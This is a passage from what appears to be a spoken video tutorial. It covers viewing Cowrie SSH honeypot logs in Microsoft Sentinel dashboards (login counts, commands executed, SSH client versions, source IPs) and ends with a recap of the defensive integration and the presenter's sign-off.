happen. Successful login were 9, failed logins were 4, file uploads is not being captured here as of yet. Total file downloads is 1, command executed 25. based on all the event ID we have, right? You want to see the KQL, you can just edit it and come to see the KQL here like this. Basically what we were observing in the article, it's same, but only it is rendering data in a graphical format. That's the only difference, right? Here you are seeing the count of SSH client versions, right? What is the client version being used in the SSH, and what are the source IPs, right? Session connects and session close, like that. You can also create on your own. You can try to capture the geographical data from where the request is coming. To show you geographically that it is coming from this particular region or that region. So that's how you can enhance uh, the use cases around. So with that, we come to an end of understanding our integration of Cowrie Honeypot with Microsoft Sentinel. We have understood what is Cowrie Honeypot, why this integration is important, how you can set up Cowrie Honeypot. We have understood Cowrie Honeypot in general, how you can SSH to Cowrie Honeypot, how you can work as an adversary mindset towards Cowrie, and how eventually from the defender perspective we can integrate the logs and protect our environment as a whole, right? How we can lure the attackers to by creating a honeypot trap like this. So we have understood both the offensive side as well as the defensive side, and that use case I believe it would help you to explore more onto the cybersecurity initiatives. Stay tuned. Thank you. This is Vipul Thabi signing off. Thank you.